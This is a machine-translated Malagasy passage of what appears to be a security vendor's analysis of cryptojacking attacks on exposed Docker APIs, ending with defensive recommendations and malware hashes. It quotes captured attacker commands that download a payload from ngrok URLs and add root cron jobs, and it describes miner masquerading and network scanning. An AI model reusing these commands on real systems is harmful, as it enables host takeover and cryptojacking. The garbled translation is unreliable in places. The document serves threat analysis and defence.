Nanadihady ny angon-drakitra nangonina tamin'ny alalan'ny kaontenera honeypot izahay, izay noforoninay hanaraha-maso ny fandrahonana. Ary nahita hetsika manan-danja avy amin'ireo mpitrandraka kriptocurrency tsy niriana na tsy nahazoana alalana napetraka ho kaontenera jiolahy mampiasa sary navoakan'ny vondrom-piarahamonina ao amin'ny Docker Hub. Ny sary dia ampiasaina ho ampahany amin'ny serivisy manolotra mpitrandraka cryptocurrency ratsy.
Fanampin'izany, napetraka ny programa hiarahana amin'ny tambajotra mba hidirana amin'ireo kaontenera sy fampiharana mifanakaiky.
Avelantsika ho toy ny misy ny tantely, izany hoe, miaraka amin'ny fikandrana default, tsy misy fepetra fiarovana na fametrahana rindrambaiko fanampiny. Mariho fa ny Docker dia manana tolo-kevitra momba ny fananganana voalohany mba hisorohana ny fahadisoana sy ny vulnerability tsotra. Fa ny fitoeran-tantely ampiasaina dia kaontenera, natao hamantarana ny fanafihana natao ho an'ny sehatry ny containerization, fa tsy ny fampiharana ao anaty container.
Ny hetsika ratsy hita dia misongadina ihany koa satria tsy mitaky vulnerability ary tsy miankina amin'ny dikan-Docker ihany koa. Ny fitadiavana sarin'ny kaontenera tsy voarindra, ary noho izany dia misokatra, ny hany ilain'ny mpanafika hamindra ny lohamilina misokatra.
Ny Docker API tsy voahidy dia ahafahan'ny mpampiasa manao karazany maro , ao anatin'izany ny fahazoana lisitry ny kaontenera mandeha, ny fahazoana diary avy amina kaontenera iray manokana, ny fanombohana, ny fijanonana (anisan'izany ny fanerena) ary na ny famoronana fitoerana vaovao avy amin'ny sary iray manokana miaraka amin'ny filaharana voafaritra.
Eo ankavia ny fomba fandefasana malware. Eo amin'ny ankavanana ny tontolon'ny mpanafika, izay mamela ny famoahana sary avy lavitra.
Fizarana amin'ny firenena misy 3762 Open Docker API. Miorina amin'ny fikarohana Shodan tamin'ny 12.02.2019/XNUMX/XNUMX
Safidin'ny rojo fanafihana sy entana
Ny asa ratsy dia hita fa tsy tamin'ny fanampian'ny tantely ihany. Ny angon-drakitra avy amin'i Shodan dia mampiseho fa nitombo ny isan'ny Docker APIs (jereo ny tabilao faharoa) hatramin'ny nanadihadianay ny kaontenera diso fampiasa ho tetezana hametrahana rindrambaiko fitrandrahana cryptocurrency Monero. Tamin'ny Oktobra tamin'ny taon-dasa (2018, angon-drakitra ankehitriny eo ho eo MPANDIKA TENY) tsy nisy afa-tsy 856 API misokatra.
Ny fandinihana ny diarin'ny honeypot dia hita fa misy ifandraisany amin'ny fampiasana ny sarin'ny kaontenera ihany koa . Izany dia ahafahan'ny mpanafika mamorona URL mavitrika rehefa mandefa entana amin'ny mpizara misokatra. Ireto ambany ireto ny ohatra kaody avy amin'ny diary mampiseho fanararaotana ny serivisy ngrok:
Tty: false
Command: â-c curl âretry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d âhxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283â;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283dâ >/tmp9bedce/etc/crontab;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283dâ >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c âcron || crondââ,
Entrypoint: â/bin/shâ
Tty: false,
Command: â-c curl âretry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d âhxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283â;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283dâ >/tmp570547/etc/crontab;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283dâ >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c âcron || crondââ,
Entrypoint: â/bin/shâ
Tty: false,
Command: â-c curl âretry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed âhxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4eeâ;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eedâ >/tmp326c80/etc/crontab;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eedâ >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c âcron || crondââ,
Entrypoint: â/bin/shâ,
Tty: false,
Cmd: â-c curl âretry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed âhxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4eeâ;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eedâ >/tmp8b9b5b/etc/crontab;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eedâ >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c âcron || crondââ,
Entrypoint: â/bin/shâAraka ny hitanao, ny rakitra nampidirina dia alaina avy amin'ny URL miova tsy tapaka. Ireo URL ireo dia manana daty lany daty fohy, ka tsy azo alaina ny enta-mavesatra aorian'ny daty lany daty.
Misy safidy roa amin'ny fampiasana ny "loadload". Ny voalohany dia "miner" voaangona amin'ny endrika ELF ho an'ny Linux (fantatra amin'ny anarana hoe Coinminer.SH.MALXMR.ATNO), izay mifandray amin'ny dobo fitrandrahana. Ny faharoa dia script (TrojanSpy.SH.ZNETMAP.A), natao hahazoana fitaovana tambajotra sasany ampiasaina hijerena ny tambajotra ary avy eo hikaroka lasibatra vaovao.
Ny script dropper dia mametraka variables roa, izay ampiasaina amin'ny fametrahana ny mpitrandraka cryptocurrency. Ny fari-piadidiana HOST dia ahitana ny URL misy ireo rakitra maloto, ary ny fari-piadidiana RIP dia ny anaran-drakitra (raha ny marina, ny hash) an'ny mpitrandraka hapetraka. Ny fiovan'ny HOST dia miova isaky ny miova ny fiovan'ny hash. Ny script koa dia manandrana manamarina fa tsy misy mpitrandraka cryptocurrency hafa mandeha amin'ny mpizara voatafika.
Ohatra amin'ny variable HOST sy RIP, ary koa sombin-kaody ampiasaina hanamarinana fa tsy misy mpitrandraka hafa mandeha.
Alohan'ny hanombohana ny mpitrandraka dia ovaina ho nginx ny anarany. Ny dikan-teny hafa amin'ity script ity dia manova ny anaran'ny mpitrandraka ho serivisy ara-dalĂ na hafa izay mety ho hita ao amin'ny tontolo iainana. LinuxMatetika izany dia ampy handalovana ireo fanamarinana amin'ny lisitry ny dingana miasa.
Manana endri-javatra ihany koa ny script fikarohana. Izy io dia miasa miaraka amin'ny serivisy URL mitovy amin'ny fametrahana ireo fitaovana ilaina. Anisan'izany ny zmap binary, izay ampiasaina hijerena tambajotra sy hahazoana lisitry ny seranana misokatra. Ny script koa dia mametaka binary hafa izay ampiasaina hifaneraserana amin'ireo serivisy hita ary handraisana sora-baventy avy amin'izy ireo mba hamaritana fampahalalana fanampiny momba ny serivisy hita (ohatra, ny dikan-ny).
Ny script ihany koa dia mamaritra mialoha ny tambajotra sasany hojerena, saingy miankina amin'ny dikan'ny script izany. Izy io koa dia mametraka ny seranan-tsambo kendrena amin'ny serivisy - amin'ity tranga ity, Docker - alohan'ny hanaovana ny scan.
Raha vao hita ireo lasibatra mety ho hita dia esorina ho azy ireo sora-baventy. Manivana ireo lasibatra ihany koa ny script mifototra amin'ny serivisy, fampiharana, singa, na sehatra mahaliana azy: Redis, Jenkins, Drupal, MODX, , mpanjifa Docker 1.16 ary Apache CouchDB. Raha mifanandrify amin'ny iray amin'izy ireo ny mpizara notarafina, dia voatahiry ao anaty rakitra an-tsoratra izy io, izay azon'ny mpanafika ampiasaina amin'ny famakafakana sy fijirika manaraka. Ireo rakitra lahatsoratra ireo dia ampidirina amin'ny lohamilin'ny mpanafika amin'ny alĂ lan'ny rohy mavitrika. Izany hoe, URL mitokana no ampiasaina ho an'ny rakitra tsirairay, izay midika fa sarotra ny fidirana manaraka.
Ny vector fanafihana dia sary Docker, araka ny hita ao amin'ny kaody roa manaraka.
Eo an-tampony dia manova anarana ho serivisy ara-dalĂ na, ary eo ambany ny fomba fampiasana ny zmap hijerena tambajotra.
Eo an-tampony dia misy tambajotram-pifandraisana efa voafaritra mialoha, ao ambany dia misy seranana manokana hikaroka serivisy, anisan'izany ny Docker
Ny pikantsary dia mampiseho fa efa in-10 tapitrisa mahery no nakarina ilay sary alpine-curl
Miorina amin'ny Alpine Linux ary ny curl, fitaovana CLI mahomby amin'ny famindrana rakitra amin'ny alĂ lan'ny protocols isan-karazany, dia azo angonina . Araka ny hitanao amin'ny sary teo aloha dia efa in-10 tapitrisa mahery no nakarina ity sary ity. Ny fampidinana be dia be dia mety midika fa mampiasa ity sary ity ho toerana idirana; enim-bolana mahery no nohavaozina ity sary ity; tsy naka sary hafa tao amin'ity tahiry ity matetika ny mpampiasa. Ao amin'ny Docker - toromarika ampiasaina hanamboarana kaontenera iray hampandehanana azy. Raha diso ny firafitry ny teboka fidirana (ohatra, avela misokatra amin'ny Internet ny fitoeran-javatra), dia azo ampiasaina ho vector fanafihana ilay sary. Ny mpanafika dia afaka mampiasa azy io mba handefasana entana raha mahita fitoeran-javatra diso na misokatra tsy misy tohana.
Zava-dehibe ny manamarika fa ity sary (alpine-curl) ity dia tsy manimba, fa araka ny hitanao etsy ambony, dia azo ampiasaina hanaovana asa ratsy. Ny sary Docker mitovy amin'izany dia azo ampiasaina hanaovana asa ratsy ihany koa. Nifandray tamin'i Docker izahay ary niara-niasa tamin'izy ireo momba ity olana ity.
tolo-kevitra
sisa tavela ho an'ny orinasa maro, indrindra fa ny fampiharana , mifantoka amin'ny fampandrosoana haingana sy ny fanaterana. Miharatsy ny zava-drehetra noho ny filĂ na fanarahana ny fitsipika fanaraha-maso sy fanaraha-maso, ny filĂ na fanaraha-maso ny tsiambaratelon'ny angon-drakitra, ary koa ny fahasimbana goavana amin'ny tsy fanarahan-dalĂ na. Ny fampidirana automatique fiarovana ao anatin'ny tsingerin'ny fiainan'ny fampandrosoana dia tsy vitan'ny hoe manampy anao hahita lavaka fiarovana izay mety tsy ho hita raha tsy izany, fa manampy anao koa hampihena ny enta-mavesatra tsy ilaina, toy ny fampandehanana rindrambaiko fanampiny ho an'ny vulnerable tsirairay hita na diso konfigurasi aorian'ny fametrahana fampiharana.
Ny zava-nitranga resahina ato amin'ity lahatsoratra ity dia manasongadina ny ilĂ na ny fitandremana ny fiarovana hatrany am-piandohana, ao anatin'izany ireto soso-kevitra manaraka ireto:
- Ho an'ny mpandrindra sy mpamorona rafitra: Jereo foana ny firafitry ny API-nao mba hahazoana antoka fa voarindra avokoa ny zavatra rehetra mba hanaiky ny fangatahana avy amin'ny mpizara manokana na tambajotra anatiny ihany.
- Araho ny fitsipiky ny zo faran'izay kely indrindra: ho azo antoka fa voasonia sy voamarina ny sarin'ny kaontenera, ferana ny fidirana amin'ireo singa manan-danja (serivisy fandefasana entana) ary ampio fanafenana amin'ny fifandraisana amin'ny tambajotra.
- Araho ary avelao ny rafitra fiarovana, oh. ary naorina-in .
- MampiasĂ fitarafana mandeha ho azy amin'ny fotoam-pivoriana sy sary mba hahazoana fampahalalana fanampiny momba ny dingana mandeha ao amin'ny kaontenera (ohatra, mba hamantarana ny fanodikodinam-bola na ny fitadiavana ireo vulnerable). Ny fanaraha-maso ny fampiharana sy ny fanaraha-maso ny fahamendrehana dia manampy amin'ny fanaraha-maso ny fiovana tsy ara-dalĂ na amin'ny lohamilina, ny rakitra ary ny faritra misy rafitra.
Ny Trendmicro dia manampy ny ekipa DevOps hanorina azo antoka, hivoaka haingana ary hanomboka na aiza na aiza. Trend Micro Manome fiarovana matanjaka, mirindra ary mandeha ho azy manerana ny fantsona DevOps an'ny fikambanana ary manome fiarovana fandrahonana marobe mba hiarovana ny enta-mavesatra ara-batana, virtoaly ary rahona mandritra ny fotoana fiasana. Manampy fiarovana amin'ny container miaraka amin'ny Đž , izay mijery ny sarin'ny container Docker ho an'ny malware sy ny vulnerability amin'ny fotoana rehetra ao amin'ny fantsona fampandrosoana mba hisorohana ny fandrahonana alohan'ny hametrahana azy ireo.
Famantarana ny marimaritra iraisana
Hash mifandraika:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
amin'ny Asehon'ireo mpandahateny manao fanazaran-tena hoe inona no toe-javatra tokony hatao aloha mba hampihenana ny mety hitranga na hialana tanteraka amin'ny fisehoan-javatra voalaza etsy ambony. Ary tamin'ny 19-21 aogositra tao amin'ny Internet intensive Azonao atao ny mifanakalo hevitra momba ireo olana ireo sy ny olana ara-piarovana mitovy amin'izany miaraka amin'ny mpiara-miasa sy ny mpampianatra zatra eo amin'ny latabatra boribory, izay ahafahan'ny tsirairay miteny sy mihaino ny fanaintainana sy ny fahombiazan'ny mpiara-miasa efa za-draharaha.
Source: www.habr.com
